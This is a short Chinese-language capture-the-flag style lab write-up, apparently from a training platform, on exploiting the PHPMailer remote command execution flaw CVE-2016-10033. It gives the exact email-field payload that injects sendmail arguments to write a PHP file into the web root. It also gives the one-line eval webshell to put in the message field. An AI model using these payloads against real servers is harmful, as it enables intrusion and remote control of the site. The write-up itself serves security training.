墨者学院 - PHPMailer远程命令执行漏洞溯源

首先我们需要了解 CVE-2016-10033:PHPMailer远程代码执行漏洞的分析
https://www.anquanke.com/post/id/85295

一、实训目标

1、了解Burp suite中Spider模块使用方法;
2、了解PHPMailer远程命令执行漏洞利用方法;

二、实战

1、通过Burp Suite中spider模块扫描网站目录结构,如图1所示。


图1 扫描网站结构

2、发现mail.php页面。我们打开查看,如图2所示。


图2 打开mail.php

3、插入恶意代码
(1)在name处随便输入
比如aaa
(2)在email处输入

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com

(3)在message处输入一句话木马

<?php @eval($_POST[a]);?>

4、点击Send email发送。最后通过菜刀链接,key在根目录。

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容